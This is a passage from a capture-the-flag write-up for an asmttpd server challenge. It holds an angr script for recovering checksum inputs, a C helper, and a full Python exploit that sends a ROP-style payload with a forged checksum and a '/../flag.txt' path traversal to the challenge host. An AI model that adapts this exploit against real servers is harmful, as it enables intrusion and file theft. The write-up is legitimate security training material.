import binascii import angr import simuvex ADDR_OF_MAIN = # address of main() function ADDR_OF_INPUT_ARR = # address of t2[] global array SIZE_OF_INPUT = # size in bytes of t2[] ADDR_OF_PRINTF = # address of call printf p = angr. Project ( "murmur.exe" , use_sim_procedures = True ) initial_state = p. factory . blank_state ( addr = ADDR_OF_MAIN ) str_ptr = ADDR_OF_INPUT_ARR flag = initial_state. se . BVS ( 'flag' , SIZE_OF_INPUT * 8 ) initial_state. memory . store ( str_ptr , flag ) initial_path = p. factory . path ( state = initial_state ) ex = angr. surveyors . Explorer ( p , start = initial_path , find = ( ADDR_OF_PRINTF , ) ) r = ex. run ( ) print binascii . hexlify ( r. found [ 0 ] . state . se . any_str ( r. found [ 0 ] . state . memory . load ( str_ptr , SIZE_OF_INPUT ) ) ) import binascii import angr import simuvex ADDR_OF_MAIN = # address of main() function ADDR_OF_INPUT_ARR = # address of t2[] global array SIZE_OF_INPUT = # size in bytes of t2[] ADDR_OF_PRINTF = # address of call printf p = angr.Project("murmur.exe", use_sim_procedures = True) initial_state = p.factory.blank_state(addr = ADDR_OF_MAIN) str_ptr = ADDR_OF_INPUT_ARR flag = initial_state.se.BVS('flag', SIZE_OF_INPUT * 8) initial_state.memory.store(str_ptr, flag) initial_path = p.factory.path(state=initial_state) ex = angr.surveyors.Explorer(p, start=initial_path, find = (ADDR_OF_PRINTF, )) r = ex.run() print binascii.hexlify(r.found[0].state.se.any_str(r.found[0].state.memory.load(str_ptr, SIZE_OF_INPUT)))

After 3 minutes I got the answer:

18a37f025de730e2dd77b5a0c84990e6 18a37f025de730e2dd77b5a0c84990e6

So, according to the hmac():

v5 [ 1 ] = murmur1 ( 0xDEFACEDBAADF00DLL, v5, 24LL ) ; v5 [ 0 ] = checksum ^ 0x3636363636363636LL ; return murmur1 ( 0xFACEB00CCAFEBABELL, v5, 16LL ) ; v5[1] = murmur1(0xDEFACEDBAADF00DLL, v5, 24LL); v5[0] = checksum ^ 0x3636363636363636LL; return murmur1(0xFACEB00CCAFEBABELL, v5, 16LL);

v5 [ 0 ] = 0xe230e75d027fa318 ; v5 [ 1 ] = 0xe69049c8a0b577dd ; checksum = v5 [ 0 ] ^ 0x3636363636363636 ; v5[0] = 0xe230e75d027fa318; v5[1] = 0xe69049c8a0b577dd; checksum = v5[0] ^ 0x3636363636363636;

Using this data I’ve compiled another small C program:

__int64 t2 [ 3 ] = { 0xe230e75d027fa318LL ^ 0x3636363636363636LL ^ 0x5C5C5C5C5C5C5C5CLL, 0 , 0 } ; int main ( ) { if ( 0xe69049c8a0b577ddLL == murmur1 ( 0xDEFACEDBAADF00DLL, t2, 24 ) ) printf ( "yuppie XXX!

" ) ; } __int64 t2[3] = { 0xe230e75d027fa318LL ^ 0x3636363636363636LL ^ 0x5C5C5C5C5C5C5C5CLL, 0, 0 }; int main() { if (0xe69049c8a0b577ddLL == murmur1(0xDEFACEDBAADF00DLL, t2, 24)) printf("yuppie XXX!

"); }

I’ve used exactly the same ANGR script to get the final results, just fixed the addresses (and used address of t2[1], since t[0] is given). Result:

payload [ 187 ] = 0x5ae6e739c60d452c ; payload [ 188 ] = 0x4cf9f1385a12acf8 ; payload[187] = 0x5ae6e739c60d452c; payload[188] = 0x4cf9f1385a12acf8;

And the final exploit:

import struct import socket def resetString ( strAddr , defRet = 0x40011A ) : ret = '' ret + = struct . pack ( '<Q' , 0x0 ) ret + = struct . pack ( '<Q' , 0x6017C0 ) ret + = struct . pack ( '<Q' , strAddr ) ret + = struct . pack ( '<Q' , 0x4001AF ) ret + = struct . pack ( '<Q' , defRet ) return ret #s = socket.create_connection(("127.0.0.1", 6601)) s = socket . create_connection ( ( "slick.vuln.icec.tf" , 6601 ) ) dummy = '/../flag.txt ' + 'SEX' * 666 payload = struct . pack ( '<Q' , 0x40011B ) payload + = struct . pack ( '<Q' , 0x0 ) payload + = struct . pack ( '<Q' , 0x401172 ) payload + = struct . pack ( '<Q' , 0x400E39 ) payload + = struct . pack ( '<Q' , 0x40011A ) payload + = resetString ( 0x6018E2 ) payload + = resetString ( 0x6018FE ) payload + = resetString ( 0x60192B ) payload + = resetString ( 0x6017EB ) payload + = resetString ( 0x6017DB , 0x401209 ) payload + = struct . pack ( '<Q' , 0x160 ) payload + = dummy [ : 1512 - len ( payload ) - 3 * 8 ] adjustment = 0 for i in xrange ( 0 , len ( payload ) , 8 ) : adjustment ^ = struct . unpack ( '<Q' , payload [ i:i+ 8 ] ) [ 0 ] payload + = struct . pack ( '<Q' , adjustment ^ 0x5ae6e739c60d452c ^ 0x4cf9f1385a12acf8 ^ 0xe230e75d027fa318 ^ 0x3636363636363636 ) payload + = struct . pack ( '<Q' , 0x5ae6e739c60d452c ) payload + = struct . pack ( '<Q' , 0x4cf9f1385a12acf8 ) payload + = struct . pack ( '<Q' , 0x29A ) s. send ( payload ) print s. recv ( 1024 ) s. close ( ) import struct import socket def resetString(strAddr, defRet = 0x40011A): ret = '' ret += struct.pack('<Q', 0x0) ret += struct.pack('<Q', 0x6017C0) ret += struct.pack('<Q', strAddr) ret += struct.pack('<Q', 0x4001AF) ret += struct.pack('<Q', defRet) return ret #s = socket.create_connection(("127.0.0.1", 6601)) s = socket.create_connection(("slick.vuln.icec.tf", 6601)) dummy = '/../flag.txt ' + 'SEX'*666 payload = struct.pack('<Q', 0x40011B) payload += struct.pack('<Q', 0x0) payload += struct.pack('<Q', 0x401172) payload += struct.pack('<Q', 0x400E39) payload += struct.pack('<Q', 0x40011A) payload += resetString(0x6018E2) payload += resetString(0x6018FE) payload += resetString(0x60192B) payload += resetString(0x6017EB) payload += resetString(0x6017DB, 0x401209) payload += struct.pack('<Q', 0x160) payload += dummy[:1512 - len(payload) - 3*8] adjustment = 0 for i in xrange( 0, len(payload), 8 ): adjustment ^= struct.unpack('<Q', payload[i:i+8])[0] payload += struct.pack('<Q', adjustment ^ 0x5ae6e739c60d452c ^ 0x4cf9f1385a12acf8 ^ 0xe230e75d027fa318 ^ 0x3636363636363636) payload += struct.pack('<Q', 0x5ae6e739c60d452c) payload += struct.pack('<Q', 0x4cf9f1385a12acf8) payload += struct.pack('<Q', 0x29A) s.send(payload) print s.recv(1024) s.close()

And flag:

f:\research\ice2016 > asmttpd_final_hard.py k ` application / oIceCTF { m4ster1ng_the_4rt_of_f1x3d_p0ints } f:\research\ice2016>asmttpd_final_hard.py k`application/oIceCTF{m4ster1ng_the_4rt_of_f1x3d_p0ints}

This was quite nice challenge, however I feel that I solved it not in the way the author wanted it to be solved. I would like to thanks @1amtom for his help with ANGR and Python.